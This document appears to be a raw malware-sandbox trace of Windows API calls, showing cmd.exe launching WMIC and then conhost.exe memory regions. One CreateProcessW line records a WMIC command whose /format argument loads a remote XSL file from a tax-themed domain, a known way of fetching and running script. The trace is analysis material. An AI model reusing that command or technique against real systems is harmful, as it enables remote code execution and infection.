"c:\\windows\\system32\\cmd.exe")) returned 0x1b [0048.748] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0048.748] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.748] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0048.749] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0048.749] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0048.749] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0048.749] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0048.749] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0048.749] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0048.749] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0048.749] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0048.749] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0048.749] GetEnvironmentStringsW () returned 0x1ebe7635730* [0048.749] FreeEnvironmentStringsA (penv="=") returned 1 [0048.749] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.749] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0048.749] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0048.749] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0048.749] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0048.749] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0048.749] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0048.749] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0048.749] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0048.749] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0048.749] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x194ddffb60 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19 [0048.749] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x104, lpBuffer=0x194ddffb60, lpFilePart=0x194ddffb40 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x194ddffb40*="Desktop") returned 0x19 [0048.749] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11 [0048.750] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x194ddff870 | out: lpFindFileData=0x194ddff870) returned 0x1ebe76308b0 [0048.750] FindClose (in: hFindFile=0x1ebe76308b0 | out: hFindFile=0x1ebe76308b0) returned 1 [0048.750] FindFirstFileW (in: lpFileName="C:\\Users\\Nd9E1FYi", lpFindFileData=0x194ddff870 | out: lpFindFileData=0x194ddff870) returned 0x1ebe7630720 [0048.750] FindClose (in: hFindFile=0x1ebe7630720 | out: hFindFile=0x1ebe7630720) returned 1 [0048.750] FindFirstFileW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", lpFindFileData=0x194ddff870 | out: lpFindFileData=0x194ddff870) returned 0x1ebe7630720 [0048.751] FindClose (in: hFindFile=0x1ebe7630720 | out: hFindFile=0x1ebe7630720) returned 1 [0048.751] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11 [0048.751] SetCurrentDirectoryW (lpPathName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 1 [0048.751] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\Nd9E1FYi\\Desktop") returned 1 [0048.751] GetEnvironmentStringsW () returned 0x1ebe7638790* [0048.751] FreeEnvironmentStringsA (penv="=") returned 1 [0048.751] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff649151940 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19 [0048.751] GetConsoleOutputCP () returned 0x1b5 [0048.752] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff649149660 | out: lpCPInfo=0x7ff649149660) returned 1 [0048.752] GetUserDefaultLCID () returned 0x409 [0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff64914d6a0, cchData=8 | out: lpLCData=":") returned 2 [0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x194ddffc90, cchData=128 | out: lpLCData="0") returned 2 [0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x194ddffc90, cchData=128 | out: lpLCData="0") returned 2 [0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x194ddffc90, cchData=128 | out: lpLCData="1") returned 2 [0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff64914d6b0, cchData=8 | out: lpLCData="/") returned 2 [0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff64914d700, cchData=32 | out: lpLCData="Mon") returned 4 [0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff64914d740, cchData=32 | out: lpLCData="Tue") returned 4 [0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff64914d780, cchData=32 | out: lpLCData="Wed") returned 4 [0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff64914d7c0, cchData=32 | out: lpLCData="Thu") returned 4 [0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff64914d800, cchData=32 | out: lpLCData="Fri") returned 4 [0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff64914d840, cchData=32 | out: lpLCData="Sat") returned 4 [0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff64914d880, cchData=32 | out: lpLCData="Sun") returned 4 [0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff64914d6c0, cchData=8 | out: lpLCData=".") returned 2 [0048.752] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff64914d6e0, cchData=8 | out: lpLCData=",") returned 2 [0048.752] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0048.754] GetConsoleTitleW (in: lpConsoleTitle=0x1ebe76310c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\CMD.EXE") returned 0x1b [0048.754] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffc17120000 [0048.754] GetProcAddress (hModule=0x7ffc17120000, lpProcName="CopyFileExW") returned 0x7ffc17148940 [0048.754] GetProcAddress (hModule=0x7ffc17120000, lpProcName="IsDebuggerPresent") returned 0x7ffc17147460 [0048.754] GetProcAddress (hModule=0x7ffc17120000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffc145a6e50 [0048.755] _wcsicmp (_String1="wmic", _String2=")") returned 78 [0048.755] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0048.755] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0048.755] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0048.755] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0048.755] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0048.755] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0048.756] GetConsoleTitleW (in: lpConsoleTitle=0x194ddffb80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\CMD.EXE") returned 0x1b [0048.756] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0048.756] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0048.756] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0048.756] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0048.756] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0048.756] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0048.756] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0048.756] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0048.756] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0048.756] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0048.756] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0048.756] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0048.756] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0048.756] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0048.756] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0048.756] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0048.756] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0048.756] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0048.756] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0048.757] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0048.757] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0048.757] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0048.757] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0048.757] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0048.757] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0048.757] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0048.757] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0048.757] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0048.757] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0048.757] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0048.757] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0048.757] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0048.757] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0048.757] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0048.757] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0048.757] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0048.757] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0048.757] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0048.757] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0048.757] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0048.757] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0048.757] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0048.757] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0048.757] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0048.757] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0048.758] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0048.758] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0048.758] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0048.758] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0048.758] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0048.758] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0048.758] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0048.758] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0048.758] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0048.758] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0048.758] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0048.758] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0048.758] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0048.758] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0048.758] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0048.758] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0048.758] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0048.758] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0048.758] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0048.758] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0048.758] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0048.758] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0048.758] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0048.758] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0048.758] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0048.758] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0048.758] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0048.758] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0048.758] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0048.758] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0048.758] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0048.758] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0048.758] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0048.758] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0048.758] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0048.764] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0048.764] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0048.764] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0048.764] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0048.764] _wcsicmp (_String1="wmic", _String2="FOR") returned 17 [0048.764] _wcsicmp (_String1="wmic", _String2="IF") returned 14 [0048.764] _wcsicmp (_String1="wmic", _String2="REM") returned 5 [0048.764] _wcsnicmp (_String1="wmic", _String2="cmd ", _MaxCount=0x4) returned 20 [0048.765] SetErrorMode (uMode=0x0) returned 0x8001 [0048.765] SetErrorMode (uMode=0x1) returned 0x0 [0048.765] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1ebe7638b00, lpFilePart=0x194ddff420 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x194ddff420*="Desktop") returned 0x19 [0048.765] SetErrorMode (uMode=0x8001) returned 0x1 [0048.765] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0048.765] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0048.771] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.776] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.776] FindFirstFileExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x194ddff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x194ddff1a0) returned 0xffffffffffffffff [0048.776] GetLastError () returned 0x2 [0048.776] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.776] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x194ddff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x194ddff1a0) returned 0xffffffffffffffff [0048.778] GetLastError () returned 0x2 [0048.778] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.779] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x194ddff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x194ddff1a0) returned 0xffffffffffffffff [0048.779] GetLastError () returned 0x2 [0048.779] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.779] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x194ddff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x194ddff1a0) returned 0xffffffffffffffff [0048.779] GetLastError () returned 0x2 [0048.779] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.779] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x194ddff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x194ddff1a0) returned 0x1ebe7638eb0 [0048.780] FindClose (in: hFindFile=0x1ebe7638eb0 | out: hFindFile=0x1ebe7638eb0) returned 1 [0048.780] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x194ddff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x194ddff1a0) returned 0xffffffffffffffff [0048.780] GetLastError () returned 0x2 [0048.780] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x194ddff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x194ddff1a0) returned 0x1ebe7638eb0 [0048.780] FindClose (in: hFindFile=0x1ebe7638eb0 | out: hFindFile=0x1ebe7638eb0) returned 1 [0048.780] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0048.780] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0048.780] GetConsoleTitleW (in: lpConsoleTitle=0x194ddff700, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\CMD.EXE") returned 0x1b [0048.781] InitializeProcThreadAttributeList (in: lpAttributeList=0x194ddff620, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x194ddff520 | out: lpAttributeList=0x194ddff620, lpSize=0x194ddff520) returned 1 [0048.781] UpdateProcThreadAttribute (in: lpAttributeList=0x194ddff620, dwFlags=0x0, Attribute=0x60001, lpValue=0x194ddff50c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x194ddff620, lpPreviousValue=0x0) returned 1 [0048.781] GetStartupInfoW (in: lpStartupInfo=0x194ddff5b0 | out: lpStartupInfo=0x194ddff5b0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\CMD.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x7, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0048.781] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0048.782] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0048.782] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0048.782] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0048.782] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0048.782] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0048.782] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0048.782] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0048.782] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0048.782] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0048.783] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\Nd9E1FYi\\Desktop", lpStartupInfo=0x194ddff540*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="wmic os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x194ddff528 | out: lpCommandLine="wmic os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ", lpProcessInformation=0x194ddff528*(hProcess=0x8c, hThread=0x88, dwProcessId=0xd94, dwThreadId=0xdf0)) returned 1 [0049.155] CloseHandle (hObject=0x88) returned 1 [0049.155] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0049.155] GetEnvironmentStringsW () returned 0x1ebe76358d0* [0049.155] FreeEnvironmentStringsA (penv="=") returned 1 [0049.155] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) Thread: id = 38 os_tid = 0xe24 Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x33fa7000" os_pid = "0x4dc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xccc" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "X2VS1CUM\\Nd9E1FYi" os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb37" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 521 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 522 start_va = 0x90fa550000 end_va = 0x90fa58ffff entry_point = 0x0 region_type = private name = "private_0x00000090fa550000" filename = "" Region: id = 523 start_va = 0x90fa600000 end_va = 0x90fa7fffff entry_point = 0x0 region_type = private name = "private_0x00000090fa600000" filename = "" Region: id = 524 start_va = 0x1b69e450000 end_va = 0x1b69e46ffff entry_point = 0x0 region_type = private name = "private_0x000001b69e450000" filename = "" Region: id = 525 start_va = 0x1b69e470000 end_va = 0x1b69e484fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b69e470000" filename = "" Region: id = 526 start_va = 0x7df5ff0f0000 end_va = 0x7ff5ff0effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff0f0000" filename = "" Region: id = 527 start_va = 0x7ff7ab0e0000 end_va = 0x7ff7ab102fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7ab0e0000" filename = "" Region: id = 528 start_va = 0x7ff7ab8e0000 end_va = 0x7ff7ab8f0fff entry_point = 0x7ff7ab8e0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 529 start_va = 0x7ffc17400000 end_va = 0x7ffc175c0fff entry_point = 0x7ffc17400000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 530 start_va = 0x1b69e550000 end_va = 0x1b69e64ffff entry_point = 0x0 region_type = private name = "private_0x000001b69e550000" filename = "" Region: id = 531 start_va = 0x7ffc14550000 end_va = 0x7ffc14737fff entry_point = 0x7ffc14550000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 532 start_va = 0x7ffc17120000 end_va = 0x7ffc171ccfff entry_point = 0x7ffc17120000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 533 start_va = 0x90fa590000 end_va = 0x90fa5cffff entry_point = 0x0 region_type = private name = "private_0x00000090fa590000" filename = "" Region: id = 534 start_va = 0x1b69e450000 end_va = 0x1b69e45ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b69e450000" filename = "" Region: id = 535 start_va = 0x1b69e490000 end_va = 0x1b69e54dfff entry_point = 0x1b69e490000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 